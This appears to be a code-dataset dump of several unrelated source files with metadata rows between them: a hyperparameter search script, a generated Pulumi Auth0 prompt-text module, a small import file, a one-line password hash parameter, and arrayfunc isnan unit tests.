skopt.space.Integer(*config.hyperpar_space['minibatch_size'], name='minibatch_size'),
skopt.space.Integer(*config.hyperpar_space['beam_width'], name='beam_width'),
],
n_initial_points=config.hyperpar_num_random_evals,
base_estimator='RF',
acq_func='EI',
acq_optimizer='auto',
random_state=0,
)
i = 0
already_seen = set()
best_hyperpar = None
best_cost = None
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt', 'r', encoding='utf-8') as f:
for line in f.read().strip().split('\n')[1:]:
i += 1
[
entry_num,
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
cost,
duration,
] = line.split('\t')
next_hyperpar = [
init_method,
float(max_init_weight),
int(embed_size),
int(rnn_size),
int(post_image_size),
int(pre_output_size) if pre_output_size != 'None' else None,
post_image_activation,
rnn_type,
optimizer,
float(learning_rate),
normalize_image == 'True',
float(weights_reg_weight),
float(image_dropout_prob),
float(post_image_dropout_prob),
float(embedding_dropout_prob),
float(rnn_dropout_prob),
float(max_gradient_norm),
int(minibatch_size),
int(beam_width),
]
cost = -float(cost)
duration = int(duration)
if i < config.hyperpar_num_random_evals + config.hyperpar_num_evals:
num_hyperpars = 1
while standardize_hyperpar(opt.ask(num_hyperpars)[-1]) != next_hyperpar:
print(i, '<<FOUND HYPERPARAMS THAT RESULTED IN ERRORS LAST TIME>>')
num_hyperpars += 1
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
already_seen.add(tuple(next_hyperpar))
print(i, *next_hyperpar, -cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
for _ in range(i, config.hyperpar_num_random_evals + config.hyperpar_num_evals):
i += 1
num_hyperpars = 1
while True:
t = lib.Timer()
next_hyperpar = standardize_hyperpar(opt.ask(num_hyperpars)[-1]) #This allows us to get different hyperparameters every time the previous hyperparameters resulted in <<SEEN>>, <<NAN>>, or <<EMPTY>>
num_hyperpars += 1
print(i, *next_hyperpar, sep='\t', end='\t')
if tuple(next_hyperpar) in already_seen:
duration = t.get_duration()
print('<<SEEN>>', lib.format_duration(duration), sep='\t')
continue
try:
cost = objective(next_hyperpar)
except model_neural_trad.NotANumberError:
duration = t.get_duration()
print('<<NAN>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'nan', duration, sep='\t', file=f)
continue
except model_neural_trad.EmptyBeamError:
duration = t.get_duration()
print('<<EMPTY>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'empty', duration, sep='\t', file=f)
continue
break
duration = t.get_duration()
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
already_seen.add(tuple(next_hyperpar))
print(-cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, -cost, duration, sep='\t', file=f)
print('-'*100)
print(lib.formatted_clock())
print('best found:')
print('', *best_hyperpar, -best_cost, sep='\t')
print()
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_best.txt', 'w', encoding='utf-8') as f:
print('WMD', -best_cost, sep='\t', file=f)
print('init_method', best_hyperpar[0], sep='\t', file=f)
print('max_init_weight', best_hyperpar[1], sep='\t', file=f)
print('embed_size', best_hyperpar[2], sep='\t', file=f)
print('rnn_size', best_hyperpar[3], sep='\t', file=f)
print('post_image_size', best_hyperpar[4], sep='\t', file=f)
print('pre_output_size', best_hyperpar[5], sep='\t', file=f)
print('post_image_activation', best_hyperpar[6], sep='\t', file=f)
print('rnn_type', best_hyperpar[7], sep='\t', file=f)
print('optimizer', best_hyperpar[8], sep='\t', file=f)
print('learning_rate', best_hyperpar[9], sep='\t', file=f)
print('normalize_image', best_hyperpar[10], sep='\t', file=f)
print('weights_reg_weight', best_hyperpar[11], sep='\t', file=f)
print('image_dropout_prob', best_hyperpar[12], sep='\t', file=f)
print('post_image_dropout_prob', best_hyperpar[13], sep='\t', file=f)
print('embedding_dropout_prob', best_hyperpar[14], sep='\t', file=f)
print('rnn_dropout_prob', best_hyperpar[15], sep='\t', file=f)
print('max_gradient_norm', best_hyperpar[16], sep='\t', file=f)
print('minibatch_size', best_hyperpar[17], sep='\t', file=f)
print('beam_width', best_hyperpar[18], sep='\t', file=f)
| 44.761905 | 266 | 0.541337 | 3,415 | 32,900 | 4.888141 | 0.081406 | 0.057329 | 0.024441 | 0.027497 | 0.889055 | 0.8736 | 0.8609 | 0.832205 | 0.813934 | 0.789852 | 0 | 0.007498 | 0.335167 | 32,900 | 735 | 267 | 44.761905 | 0.755681 | 0.010334 | 0 | 0.784848 | 0 | 0 | 0.151006 | 0.022604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007576 | false | 0 | 0.015152 | 0.001515 | 0.030303 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d805bff175791caf9195520475e0e36196e9d1a | 18,825 | py | Python | sdk/python/pulumi_auth0/prompt_custom_text.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_auth0/prompt_custom_text.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_auth0/prompt_custom_text.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['PromptCustomTextArgs', 'PromptCustomText']
@pulumi.input_type
class PromptCustomTextArgs:
def __init__(__self__, *,
body: pulumi.Input[str],
language: pulumi.Input[str],
prompt: pulumi.Input[str]):
"""
The set of arguments for constructing a PromptCustomText resource.
:param pulumi.Input[str] body: JSON containing the custom texts. You can check the options for each prompt [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values)
:param pulumi.Input[str] language: Language of the custom text. Options include `ar`, `bg`, `bs`, `cs`, `da`, `de`, `el`, `en`, `es`, `et`, `fi`, `fr`, `fr-CA`, `fr-FR`, `he`, `hi`, `hr`, `hu`, `id`, `is`, `it`, `ja`, `ko`, `lt`, `lv`, `nb`, `nl`, `pl`, `pt`, `pt-BR`, `pt-PT`, `ro`, `ru`, `sk`, `sl`, `sr`, `sv`, `th`, `tr`, `uk`, `vi`, `zh-CN`, `zh-TW`
:param pulumi.Input[str] prompt: The term `prompt` is used to refer to a specific step in the login flow. Options include `login`, `login-id`, `login-password`, `login-email-verification`, `signup`, `signup-id`, `signup-password`, `reset-password`, `consent`, `mfa-push`, `mfa-otp`, `mfa-voice`, `mfa-phone`, `mfa-webauthn`, `mfa-sms`, `mfa-email`, `mfa-recovery-code`, `mfa`, `status`, `device-flow`, `email-verification`, `email-otp-challenge`, `organizations`, `invitation`, `common`
"""
pulumi.set(__self__, "body", body)
pulumi.set(__self__, "language", language)
pulumi.set(__self__, "prompt", prompt)
@property
@pulumi.getter
def body(self) -> pulumi.Input[str]:
"""
JSON containing the custom texts. You can check the options for each prompt [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values)
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: pulumi.Input[str]):
pulumi.set(self, "body", value)
@property
@pulumi.getter
def language(self) -> pulumi.Input[str]:
"""
Language of the custom text. Options include `ar`, `bg`, `bs`, `cs`, `da`, `de`, `el`, `en`, `es`, `et`, `fi`, `fr`, `fr-CA`, `fr-FR`, `he`, `hi`, `hr`, `hu`, `id`, `is`, `it`, `ja`, `ko`, `lt`, `lv`, `nb`, `nl`, `pl`, `pt`, `pt-BR`, `pt-PT`, `ro`, `ru`, `sk`, `sl`, `sr`, `sv`, `th`, `tr`, `uk`, `vi`, `zh-CN`, `zh-TW`
"""
return pulumi.get(self, "language")
@language.setter
def language(self, value: pulumi.Input[str]):
pulumi.set(self, "language", value)
@property
@pulumi.getter
def prompt(self) -> pulumi.Input[str]:
"""
The term `prompt` is used to refer to a specific step in the login flow. Options include `login`, `login-id`, `login-password`, `login-email-verification`, `signup`, `signup-id`, `signup-password`, `reset-password`, `consent`, `mfa-push`, `mfa-otp`, `mfa-voice`, `mfa-phone`, `mfa-webauthn`, `mfa-sms`, `mfa-email`, `mfa-recovery-code`, `mfa`, `status`, `device-flow`, `email-verification`, `email-otp-challenge`, `organizations`, `invitation`, `common`
"""
return pulumi.get(self, "prompt")
@prompt.setter
def prompt(self, value: pulumi.Input[str]):
pulumi.set(self, "prompt", value)
@pulumi.input_type
class _PromptCustomTextState:
def __init__(__self__, *,
body: Optional[pulumi.Input[str]] = None,
language: Optional[pulumi.Input[str]] = None,
prompt: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PromptCustomText resources.
:param pulumi.Input[str] body: JSON containing the custom texts. You can check the options for each prompt [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values)
:param pulumi.Input[str] language: Language of the custom text. Options include `ar`, `bg`, `bs`, `cs`, `da`, `de`, `el`, `en`, `es`, `et`, `fi`, `fr`, `fr-CA`, `fr-FR`, `he`, `hi`, `hr`, `hu`, `id`, `is`, `it`, `ja`, `ko`, `lt`, `lv`, `nb`, `nl`, `pl`, `pt`, `pt-BR`, `pt-PT`, `ro`, `ru`, `sk`, `sl`, `sr`, `sv`, `th`, `tr`, `uk`, `vi`, `zh-CN`, `zh-TW`
:param pulumi.Input[str] prompt: The term `prompt` is used to refer to a specific step in the login flow. Options include `login`, `login-id`, `login-password`, `login-email-verification`, `signup`, `signup-id`, `signup-password`, `reset-password`, `consent`, `mfa-push`, `mfa-otp`, `mfa-voice`, `mfa-phone`, `mfa-webauthn`, `mfa-sms`, `mfa-email`, `mfa-recovery-code`, `mfa`, `status`, `device-flow`, `email-verification`, `email-otp-challenge`, `organizations`, `invitation`, `common`
"""
if body is not None:
pulumi.set(__self__, "body", body)
if language is not None:
pulumi.set(__self__, "language", language)
if prompt is not None:
pulumi.set(__self__, "prompt", prompt)
@property
@pulumi.getter
def body(self) -> Optional[pulumi.Input[str]]:
"""
JSON containing the custom texts. You can check the options for each prompt [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values)
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "body", value)
@property
@pulumi.getter
def language(self) -> Optional[pulumi.Input[str]]:
"""
Language of the custom text. Options include `ar`, `bg`, `bs`, `cs`, `da`, `de`, `el`, `en`, `es`, `et`, `fi`, `fr`, `fr-CA`, `fr-FR`, `he`, `hi`, `hr`, `hu`, `id`, `is`, `it`, `ja`, `ko`, `lt`, `lv`, `nb`, `nl`, `pl`, `pt`, `pt-BR`, `pt-PT`, `ro`, `ru`, `sk`, `sl`, `sr`, `sv`, `th`, `tr`, `uk`, `vi`, `zh-CN`, `zh-TW`
"""
return pulumi.get(self, "language")
@language.setter
def language(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "language", value)
@property
@pulumi.getter
def prompt(self) -> Optional[pulumi.Input[str]]:
"""
The term `prompt` is used to refer to a specific step in the login flow. Options include `login`, `login-id`, `login-password`, `login-email-verification`, `signup`, `signup-id`, `signup-password`, `reset-password`, `consent`, `mfa-push`, `mfa-otp`, `mfa-voice`, `mfa-phone`, `mfa-webauthn`, `mfa-sms`, `mfa-email`, `mfa-recovery-code`, `mfa`, `status`, `device-flow`, `email-verification`, `email-otp-challenge`, `organizations`, `invitation`, `common`
"""
return pulumi.get(self, "prompt")
@prompt.setter
def prompt(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prompt", value)
class PromptCustomText(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
body: Optional[pulumi.Input[str]] = None,
language: Optional[pulumi.Input[str]] = None,
prompt: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
With this resource, you can manage custom text on your Auth0 prompts. You can read more about custom texts
[here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts).
## Example Usage
```python
import pulumi
import json
import pulumi_auth0 as auth0
example = auth0.PromptCustomText("example",
prompt="login",
language="en",
body=json.dumps({
"login": {
"alertListTitle": "Alerts",
"buttonText": "Continue",
"description": "Login to",
"editEmailText": "Edit",
"emailPlaceholder": "Email address",
"federatedConnectionButtonText": f"Continue with {connection_name}",
"footerLinkText": "Sign up",
"footerText": "Don't have an account?",
"forgotPasswordText": "Forgot password?",
"invitationDescription": f"Log in to accept {inviter_name}'s invitation to join {company_name} on {client_name}.",
"invitationTitle": "You've Been Invited!",
"logoAltText": company_name,
"pageTitle": f"Log in | {client_name}",
"passwordPlaceholder": "Password",
"separatorText": "Or",
"signupActionLinkText": footer_link_text,
"signupActionText": footer_text,
"title": "Welcome",
"usernamePlaceholder": "Username or email address",
},
}))
```
## Import
auth0_prompt_custom_text can be imported using the import command and specifying the prompt and language separated by *:* , e.g. terminal
```sh
$ pulumi import auth0:index/promptCustomText:PromptCustomText example login:en
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] body: JSON containing the custom texts. You can check the options for each prompt [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values)
:param pulumi.Input[str] language: Language of the custom text. Options include `ar`, `bg`, `bs`, `cs`, `da`, `de`, `el`, `en`, `es`, `et`, `fi`, `fr`, `fr-CA`, `fr-FR`, `he`, `hi`, `hr`, `hu`, `id`, `is`, `it`, `ja`, `ko`, `lt`, `lv`, `nb`, `nl`, `pl`, `pt`, `pt-BR`, `pt-PT`, `ro`, `ru`, `sk`, `sl`, `sr`, `sv`, `th`, `tr`, `uk`, `vi`, `zh-CN`, `zh-TW`
:param pulumi.Input[str] prompt: The term `prompt` is used to refer to a specific step in the login flow. Options include `login`, `login-id`, `login-password`, `login-email-verification`, `signup`, `signup-id`, `signup-password`, `reset-password`, `consent`, `mfa-push`, `mfa-otp`, `mfa-voice`, `mfa-phone`, `mfa-webauthn`, `mfa-sms`, `mfa-email`, `mfa-recovery-code`, `mfa`, `status`, `device-flow`, `email-verification`, `email-otp-challenge`, `organizations`, `invitation`, `common`
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PromptCustomTextArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
With this resource, you can manage custom text on your Auth0 prompts. You can read more about custom texts
[here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts).
## Example Usage
```python
import pulumi
import json
import pulumi_auth0 as auth0
example = auth0.PromptCustomText("example",
prompt="login",
language="en",
body=json.dumps({
"login": {
"alertListTitle": "Alerts",
"buttonText": "Continue",
"description": "Login to",
"editEmailText": "Edit",
"emailPlaceholder": "Email address",
"federatedConnectionButtonText": f"Continue with {connection_name}",
"footerLinkText": "Sign up",
"footerText": "Don't have an account?",
"forgotPasswordText": "Forgot password?",
"invitationDescription": f"Log in to accept {inviter_name}'s invitation to join {company_name} on {client_name}.",
"invitationTitle": "You've Been Invited!",
"logoAltText": company_name,
"pageTitle": f"Log in | {client_name}",
"passwordPlaceholder": "Password",
"separatorText": "Or",
"signupActionLinkText": footer_link_text,
"signupActionText": footer_text,
"title": "Welcome",
"usernamePlaceholder": "Username or email address",
},
}))
```
## Import
auth0_prompt_custom_text can be imported using the import command and specifying the prompt and language separated by *:* , e.g. terminal
```sh
$ pulumi import auth0:index/promptCustomText:PromptCustomText example login:en
```
:param str resource_name: The name of the resource.
:param PromptCustomTextArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PromptCustomTextArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
body: Optional[pulumi.Input[str]] = None,
language: Optional[pulumi.Input[str]] = None,
prompt: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PromptCustomTextArgs.__new__(PromptCustomTextArgs)
if body is None and not opts.urn:
raise TypeError("Missing required property 'body'")
__props__.__dict__["body"] = body
if language is None and not opts.urn:
raise TypeError("Missing required property 'language'")
__props__.__dict__["language"] = language
if prompt is None and not opts.urn:
raise TypeError("Missing required property 'prompt'")
__props__.__dict__["prompt"] = prompt
super(PromptCustomText, __self__).__init__(
'auth0:index/promptCustomText:PromptCustomText',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
body: Optional[pulumi.Input[str]] = None,
language: Optional[pulumi.Input[str]] = None,
prompt: Optional[pulumi.Input[str]] = None) -> 'PromptCustomText':
"""
Get an existing PromptCustomText resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] body: JSON containing the custom texts. You can check the options for each prompt [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values)
:param pulumi.Input[str] language: Language of the custom text. Options include `ar`, `bg`, `bs`, `cs`, `da`, `de`, `el`, `en`, `es`, `et`, `fi`, `fr`, `fr-CA`, `fr-FR`, `he`, `hi`, `hr`, `hu`, `id`, `is`, `it`, `ja`, `ko`, `lt`, `lv`, `nb`, `nl`, `pl`, `pt`, `pt-BR`, `pt-PT`, `ro`, `ru`, `sk`, `sl`, `sr`, `sv`, `th`, `tr`, `uk`, `vi`, `zh-CN`, `zh-TW`
:param pulumi.Input[str] prompt: The term `prompt` is used to refer to a specific step in the login flow. Options include `login`, `login-id`, `login-password`, `login-email-verification`, `signup`, `signup-id`, `signup-password`, `reset-password`, `consent`, `mfa-push`, `mfa-otp`, `mfa-voice`, `mfa-phone`, `mfa-webauthn`, `mfa-sms`, `mfa-email`, `mfa-recovery-code`, `mfa`, `status`, `device-flow`, `email-verification`, `email-otp-challenge`, `organizations`, `invitation`, `common`
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PromptCustomTextState.__new__(_PromptCustomTextState)
__props__.__dict__["body"] = body
__props__.__dict__["language"] = language
__props__.__dict__["prompt"] = prompt
return PromptCustomText(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def body(self) -> pulumi.Output[str]:
"""
JSON containing the custom texts. You can check the options for each prompt [here](https://auth0.com/docs/customize/universal-login-pages/customize-login-text-prompts#prompt-values)
"""
return pulumi.get(self, "body")
@property
@pulumi.getter
def language(self) -> pulumi.Output[str]:
"""
Language of the custom text. Options include `ar`, `bg`, `bs`, `cs`, `da`, `de`, `el`, `en`, `es`, `et`, `fi`, `fr`, `fr-CA`, `fr-FR`, `he`, `hi`, `hr`, `hu`, `id`, `is`, `it`, `ja`, `ko`, `lt`, `lv`, `nb`, `nl`, `pl`, `pt`, `pt-BR`, `pt-PT`, `ro`, `ru`, `sk`, `sl`, `sr`, `sv`, `th`, `tr`, `uk`, `vi`, `zh-CN`, `zh-TW`
"""
return pulumi.get(self, "language")
@property
@pulumi.getter
def prompt(self) -> pulumi.Output[str]:
"""
The term `prompt` is used to refer to a specific step in the login flow. Options include `login`, `login-id`, `login-password`, `login-email-verification`, `signup`, `signup-id`, `signup-password`, `reset-password`, `consent`, `mfa-push`, `mfa-otp`, `mfa-voice`, `mfa-phone`, `mfa-webauthn`, `mfa-sms`, `mfa-email`, `mfa-recovery-code`, `mfa`, `status`, `device-flow`, `email-verification`, `email-otp-challenge`, `organizations`, `invitation`, `common`
"""
return pulumi.get(self, "prompt")
| 56.531532 | 494 | 0.5949 | 2,223 | 18,825 | 4.928475 | 0.124157 | 0.043173 | 0.052391 | 0.036145 | 0.829317 | 0.802209 | 0.797371 | 0.779482 | 0.770354 | 0.765699 | 0 | 0.001613 | 0.24255 | 18,825 | 332 | 495 | 56.701807 | 0.766744 | 0.605206 | 0 | 0.537415 | 1 | 0 | 0.081833 | 0.007109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.14966 | false | 0.006803 | 0.034014 | 0 | 0.272109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d91a828d903dc9048d1c82c5cebc9abf5807a62 | 94 | py | Python | ips/ip/spi_master_kl/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_master_kl/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_master_kl/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | from spi_master_kl_partial import get_ip_name
from spi_master_kl_partial import SPI_MASTER_KL
| 31.333333 | 47 | 0.914894 | 18 | 94 | 4.222222 | 0.5 | 0.355263 | 0.434211 | 0.394737 | 0.736842 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 94 | 2 | 48 | 47 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
a3038a55b9a3861f3c1acaec266b7a84ec312876 | 92 | py | Python | parameters_8000.py | altemirjosecoelho/w2p-helpdesk | f13c98854995933b4b6fd13cde678db880751ada | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | altemirjosecoelho/w2p-helpdesk | f13c98854995933b4b6fd13cde678db880751ada | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | altemirjosecoelho/w2p-helpdesk | f13c98854995933b4b6fd13cde678db880751ada | [
"BSD-3-Clause"
] | null | null | null | password="pbkdf2(1000,20,sha512)$82ba68e785a75529$b728cc8335ec9429e9143314acbfbc786156bd70"
| 46 | 91 | 0.891304 | 7 | 92 | 11.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.527473 | 0.01087 | 92 | 1 | 92 | 92 | 0.373626 | 0 | 0 | 0 | 0 | 0 | 0.869565 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a304f053233187bf607345ef6fa3b7512fef4787 | 15,131 | py | Python | unittest/test_isnan.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | 2 | 2017-08-28T08:41:16.000Z | 2018-05-29T03:49:36.000Z | unittest/test_isnan.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | unittest/test_isnan.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
##############################################################################
# Project: arrayfunc
# Module: test_isnan.py
# Purpose: arrayfunc unit test.
# Language: Python 3.4
# Date: 09-Dec-2017.
# Ver: 06-Mar-2020.
#
###############################################################################
#
# Copyright 2014 - 2020 Michael Griffin <m12.griffin@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##############################################################################
"""This conducts unit tests for isnan.
"""
##############################################################################
import sys
import array
import itertools
import math
import operator
import platform
import copy
import unittest
import arrayfunc
##############################################################################
##############################################################################
# The following code is all auto-generated.
##############################################################################
class isnan_general_nan_f(unittest.TestCase):
"""Test for basic general function operation.
test_template_nonfinite
"""
########################################################
def setUp(self):
"""Initialise.
"""
xdata = [-5.0,-1.0,0.0,0.4,0.8,1.2,1.6,2.0,2.4,2.8,3.2,3.6]
datanan = [math.nan]
datainf = [math.inf]
dataninf = [-math.inf]
self.data = array.array('f', xdata + datanan + xdata)
self.expected = any([math.isnan(x) for x in self.data])
self.limited = len(self.data) // 2
limresults = [math.isnan(x) for x in self.data]
self.expectedlim = any(limresults[:self.limited])
########################################################
def test_isnan_a1(self):
"""Test isnan basic - Array code f.
"""
result = arrayfunc.isnan(self.data)
self.assertEqual(result, self.expected)
########################################################
def test_isnan_a2(self):
"""Test isnan basic for return type - Array code f.
"""
result = arrayfunc.isnan(self.data)
self.assertIsInstance(result, bool)
########################################################
def test_isnan_b1(self):
"""Test isnan with array maxlen - Array code f.
"""
result = arrayfunc.isnan(self.data, maxlen=self.limited)
self.assertEqual(result, self.expectedlim)
##############################################################################
##############################################################################
class isnan_param_errors_nan_f(unittest.TestCase):
"""Test for invalid parameters.
param_invalid_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
xdata = [-5.0,-1.0,0.0,0.4,0.8,1.2,1.6,2.0,2.4,2.8,3.2,3.6]
datanan = [math.nan] * len(xdata)
datainf = [math.inf] * len(xdata)
dataninf = [-math.inf] * len(xdata)
self.floatarray = array.array('f', xdata + datanan)
self.floatarray2 = copy.copy(self.floatarray)
self.testmaxlen = len(self.floatarray) // 2
# Create some integer array equivalents.
self.intarray = array.array('i', [int(x) for x in xdata + xdata])
########################################################
def test_isnan_a1(self):
"""Test isnan for integer array - Array code f.
"""
# This version is expected to pass.
result = arrayfunc.isnan(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
result = arrayfunc.isnan(self.intarray)
########################################################
def test_isnan_b1(self):
"""Test isnan for maxlen='a' - Array code f.
"""
# This version is expected to pass.
result = arrayfunc.isnan(self.floatarray, maxlen=self.testmaxlen)
# This is the actual test.
with self.assertRaises(TypeError):
result = arrayfunc.isnan(self.floatarray2, maxlen='a')
########################################################
def test_isnan_c1(self):
"""Test isnan for matherrors=True (unsupported option) - Array code f.
"""
# This version is expected to pass.
result = arrayfunc.isnan(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
result = arrayfunc.isnan(self.floatarray2, matherrors=True)
########################################################
def test_isnan_d1(self):
"""Test isnan for missing array - Array code f.
"""
with self.assertRaises(TypeError):
result = arrayfunc.isnan()
########################################################
def test_isnan_d2(self):
"""Test isnan for missing array with maxlen - Array code f.
"""
with self.assertRaises(TypeError):
result = arrayfunc.isnan(maxlen=self.testmaxlen)
########################################################
def test_isnan_no_params_d3(self):
"""Test isnan with no parameters - Array code f.
"""
with self.assertRaises(TypeError):
result = arrayfunc.isnan()
##############################################################################
##############################################################################
class isnan_nan_f(unittest.TestCase):
"""Test for correct results for each of the non-finite data conditions.
nan_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
xdata = [-5.0,-1.0,0.0,0.4,0.8,1.2,1.6,2.0,2.4,2.8,3.2,3.6]
datanan = [math.nan]
datainf = [math.inf]
dataninf = [-math.inf]
self.cleandata = array.array('f', xdata + xdata)
self.testdatacentre = array.array('f', xdata + datanan + xdata)
self.testdatastart = array.array('f', datanan + xdata + xdata)
